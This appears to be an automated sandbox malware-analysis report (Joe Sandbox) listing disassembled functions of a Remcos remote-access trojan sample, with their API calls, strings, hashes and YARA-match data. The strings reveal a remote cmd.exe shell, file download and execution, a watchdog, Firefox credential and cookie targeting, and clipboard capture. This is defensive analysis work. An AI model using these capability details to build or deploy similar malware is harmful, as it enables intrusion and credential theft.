                                                          Function 0041AE5D Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 0041AE7F
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AE92
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$ForegroundText
                                                          • String ID:
                                                          • API String ID: 29597999-0
                                                          • Opcode ID: 27a61dc13c3baf2ab93a997f5cd2cb0d43e4b22d1e77ef92c0de48519faa66db
                                                          • Instruction ID: 7a6786a6daea7d79da8b38e9164549a295f8c3929764bf887eb2819544a3ffc0
                                                          • Opcode Fuzzy Hash: 27a61dc13c3baf2ab93a997f5cd2cb0d43e4b22d1e77ef92c0de48519faa66db
                                                          • Instruction Fuzzy Hash: 4AE04875A0031867FB20B7659C4EFD6766C9704B05F0400ADB619E21C3EDB4EA048BE4
                                                          Function 00414072 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,00472B28,004750FC,00000000,00414318,00000000,00000001), ref: 00414094
                                                          • WSASetLastError.WS2_32(00000000), ref: 00414099
                                                            • Part of subcall function 00413F0F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413F5E
                                                            • Part of subcall function 00413F0F: LoadLibraryA.KERNEL32(?), ref: 00413FA0
                                                            • Part of subcall function 00413F0F: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413FC0
                                                            • Part of subcall function 00413F0F: FreeLibrary.KERNEL32(00000000), ref: 00413FC7
                                                            • Part of subcall function 00413F0F: LoadLibraryA.KERNEL32(?), ref: 00413FFF
                                                            • Part of subcall function 00413F0F: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414011
                                                            • Part of subcall function 00413F0F: FreeLibrary.KERNEL32(00000000), ref: 00414018
                                                            • Part of subcall function 00413F0F: GetProcAddress.KERNEL32(00000000,?), ref: 00414027
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                          • String ID:
                                                          • API String ID: 1170566393-0
                                                          • Opcode ID: 82e440812e84df215c52e3f2a247b94cffd3b5d9bcffb41726cfdd66b840233f
                                                          • Instruction ID: e2cb8cd332084910a557c38b5932e5372e8318120e5bc29c0191cd414ba32ecd
                                                          • Opcode Fuzzy Hash: 82e440812e84df215c52e3f2a247b94cffd3b5d9bcffb41726cfdd66b840233f
                                                          • Instruction Fuzzy Hash: F4D012326406216B93506B6D5D01EBB5AEDDF96761B06003BF508D6111DA946C4142A8
                                                          Function 00409517 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID:
                                                          • API String ID: 176396367-0
                                                          • Opcode ID: 025e3e4768cc8a802bf55c327d7a2483ad7764abdea9560a4cc63c803d4be503
                                                          • Instruction ID: 7b719d08391bbb12b01dd12fa1e9474f3c31e37c6e717f7fed2b29792a4b3228
                                                          • Opcode Fuzzy Hash: 025e3e4768cc8a802bf55c327d7a2483ad7764abdea9560a4cc63c803d4be503
                                                          • Instruction Fuzzy Hash: B71193329002059BCB05FF66D8529EE77A4EF54319B10443FF842662E2EF78A915CB98
                                                          Function 00446D0F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 0df71086ebe011a22fdff847967a9c5229befe104b2723ee1c4cd472e7f23894
                                                          • Instruction ID: 40638bbf90b8c7646580dfe44e72c34c865d7c07d7b9b06d8b79509a7ad90776
                                                          • Opcode Fuzzy Hash: 0df71086ebe011a22fdff847967a9c5229befe104b2723ee1c4cd472e7f23894
                                                          • Instruction Fuzzy Hash: 52E0E5B1B00220A6FB202A6A8C02B5B36498F437B4F070033AC0A9A291CE6CCC4081AF
                                                          Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID:
                                                          • API String ID: 724789610-0
                                                          • Opcode ID: 512c305c5d81d862cf08042479f934390d4c65f7aad148c3c3ac63496dcf4775
                                                          • Instruction ID: a6df37c1a3c4b0bfee4e794801b63ea3b6ec8424062e123ecf3ffc10766d7ffb
                                                          • Opcode Fuzzy Hash: 512c305c5d81d862cf08042479f934390d4c65f7aad148c3c3ac63496dcf4775
                                                          • Instruction Fuzzy Hash: F7D012325586094ED620AAB5AD0F8A4775CD317611F0003BA6CB5825D3FA84561CC6AB
                                                          Function 00426319 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: send
                                                          • String ID:
                                                          • API String ID: 2809346765-0
                                                          • Opcode ID: 733b60b5868be77d00c88bb6e02a93299a3caf11162c6b1e2887e039244bfe1f
                                                          • Instruction ID: aaa3dbc129b5069e484ee587900df28e469ef685d0a3e158187009c9450646dc
                                                          • Opcode Fuzzy Hash: 733b60b5868be77d00c88bb6e02a93299a3caf11162c6b1e2887e039244bfe1f
                                                          • Instruction Fuzzy Hash: 30B09279118302BFCA051B60CC0887A7EB6ABC9381B108C2CB546611B0DE37C490EB36

                                                          Non-executed Functions

                                                          Function 00406F06 Relevance: 48.1, APIs: 10, Strings: 17, Instructions: 849filesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                            • Part of subcall function 0041B63A: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B694
                                                            • Part of subcall function 0041B63A: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B6C6
                                                            • Part of subcall function 0041B63A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B717
                                                            • Part of subcall function 0041B63A: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B76C
                                                            • Part of subcall function 0041B63A: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B773
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                            • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00466454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                            • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                            • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                            • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                            • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000310,00000000,{NAL,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000), ref: 0040450E
                                                            • Part of subcall function 00404468: SetEvent.KERNEL32(00000310,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000,?,?,?,?,?,00414E7B), ref: 0040453C
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                          • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                            • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                            • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00466AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                            • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                          • Sleep.KERNEL32(000007D0), ref: 00407976
                                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                            • Part of subcall function 0041BD82: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BE77
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                          • String ID: @PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $TdF$Unable to delete: $Unable to rename file!$VNG$open$pPG$pPG$pPG$pPG$NG
                                                          • API String ID: 2918587301-2537973685
                                                          • Opcode ID: 8c9b85b3cc5fd76c67877238ae870cf5e1538384d5724b3e5923403a166763a5
                                                          • Instruction ID: 1d2e2627ec10ef381271a766c0004beadc8049fa085ae304c46d09a1b017b010
                                                          • Opcode Fuzzy Hash: 8c9b85b3cc5fd76c67877238ae870cf5e1538384d5724b3e5923403a166763a5
                                                          • Instruction Fuzzy Hash: 0F42A271A043005BC614FB76C8979AE76A59F90708F40493FF946771E2EE3CAA09C6DB
                                                          Function 00405042 Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 280pipesleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 0040508E
                                                            • Part of subcall function 004336DA: EnterCriticalSection.KERNEL32(00471D18,00476D54,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 004336E4
                                                            • Part of subcall function 004336DA: LeaveCriticalSection.KERNEL32(00471D18,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 00433717
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          • __Init_thread_footer.LIBCMT ref: 004050CB
                                                          • CreatePipe.KERNEL32(00476D14,00476CFC,00476C20,00000000,0046656C,00000000), ref: 0040515E
                                                          • CreatePipe.KERNEL32(00476D00,00476D1C,00476C20,00000000), ref: 00405174
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476C30,00476D04), ref: 004051E7
                                                            • Part of subcall function 00433724: EnterCriticalSection.KERNEL32(00471D18,?,00476D54,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043372F
                                                            • Part of subcall function 00433724: LeaveCriticalSection.KERNEL32(00471D18,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043376C
                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                            • Part of subcall function 00433AB0: __onexit.LIBCMT ref: 00433AB6
                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,00466570,00000062,00466554), ref: 0040538E
                                                          • Sleep.KERNEL32(00000064,00000062,00466554), ref: 004053A8
                                                          • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                          • CloseHandle.KERNEL32 ref: 004053CD
                                                          • CloseHandle.KERNEL32 ref: 004053D5
                                                          • CloseHandle.KERNEL32 ref: 004053E7
                                                          • CloseHandle.KERNEL32 ref: 004053EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                          • String ID: lG$ mG$ mG$ mG$0lG$SystemDrive$cmd.exe$xlG$xlG$xlG$xlG$xlG
                                                          • API String ID: 3815868655-3731297122
                                                          • Opcode ID: 68d87144457253b08b549f4ac4b550c69573f0e79a638d518ea1dc6d308e707a
                                                          • Instruction ID: f3d75f47542da312923ddfb9c6ddab2c5323933c8a72fe1ed5abf95ef94fff6a
                                                          • Opcode Fuzzy Hash: 68d87144457253b08b549f4ac4b550c69573f0e79a638d518ea1dc6d308e707a
                                                          • Instruction Fuzzy Hash: 3491C571600605AFC610BB65ED42A6F3BAAEB84344F01443FF949A22E2DF7D9C448F6D
                                                          Function 0041100E Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 0041101D
                                                            • Part of subcall function 004128AD: RegCreateKeyA.ADVAPI32(80000001,00000000,TeF), ref: 004128BB
                                                            • Part of subcall function 004128AD: RegSetValueExA.KERNEL32(TeF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128D6
                                                            • Part of subcall function 004128AD: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128E1
                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00411059
                                                          • CreateThread.KERNEL32(00000000,00000000,0041170F,00000000,00000000,00000000), ref: 004110BE
                                                            • Part of subcall function 0041258F: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004125AF
                                                            • Part of subcall function 0041258F: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475308), ref: 004125CD
                                                            • Part of subcall function 0041258F: RegCloseKey.KERNEL32(?), ref: 004125D8
                                                          • CloseHandle.KERNEL32(00000000), ref: 00411068
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00411332
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                          • String ID: 0TG$Remcos restarted by watchdog!$TdF$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                          • API String ID: 65172268-4169584339
                                                          • Opcode ID: 372d1b824043999fb3ea61122839910be527bab052fefb095489169812ad4faf
                                                          • Instruction ID: de889ccbd4d484bbc366ed6bf297281231fcf4352047712fae5372da0dd81bf3
                                                          • Opcode Fuzzy Hash: 372d1b824043999fb3ea61122839910be527bab052fefb095489169812ad4faf
                                                          • Instruction Fuzzy Hash: 3D717E3160420157C214FB72CC579AE77A8AF94719F40053FF986A21E2EF7C9A49C6AF
                                                          Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                          • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                          • FindClose.KERNEL32(00000000), ref: 0040B517
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                          • API String ID: 1164774033-3681987949
                                                          • Opcode ID: 6c2aa191b7658a53db036245a9cdec4fec9e324b839b32eec9595b3f4300475a
                                                          • Instruction ID: 4260ee55bd24f38cfaff6d718e7bb7aae0563b8f0cd35122f003610daf392ab1
                                                          • Opcode Fuzzy Hash: 6c2aa191b7658a53db036245a9cdec4fec9e324b839b32eec9595b3f4300475a
                                                          • Instruction Fuzzy Hash: 0A510B319042195ADB14F7A2DC96AEE7764EF50318F50017FF806B30E2EF789A45CA9D
                                                          Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                          • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                          • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                          • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$Close$File$FirstNext
                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                          • API String ID: 3527384056-432212279
                                                          • Opcode ID: c29a3aa1853b92e95312d94e519dd42d8e7ed5a614533796f0446510dfd501b9
                                                          • Instruction ID: 1e8de758c2b97f43aed4804fc6a56dd8ce4d3e4bc3adeefe5a602588f19c01c2
                                                          • Opcode Fuzzy Hash: c29a3aa1853b92e95312d94e519dd42d8e7ed5a614533796f0446510dfd501b9
                                                          • Instruction Fuzzy Hash: F4412C319042196ACB14F7A5EC569EE7768EE11318F50017FF802B31E2EF399A458A9E
                                                          Function 00415B5E Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 00415B5F
                                                          • EmptyClipboard.USER32 ref: 00415B6D
                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00415B8D
                                                          • GlobalLock.KERNEL32(00000000), ref: 00415B96
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415BCC
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00415BD5
                                                          • CloseClipboard.USER32 ref: 00415BF2
                                                          • OpenClipboard.USER32 ref: 00415BF9
                                                          • GetClipboardData.USER32(0000000D), ref: 00415C09
                                                          • GlobalLock.KERNEL32(00000000), ref: 00415C12
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415C1B
                                                          • CloseClipboard.USER32 ref: 00415C21
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                          • String ID:
                                                          • API String ID: 3520204547-0
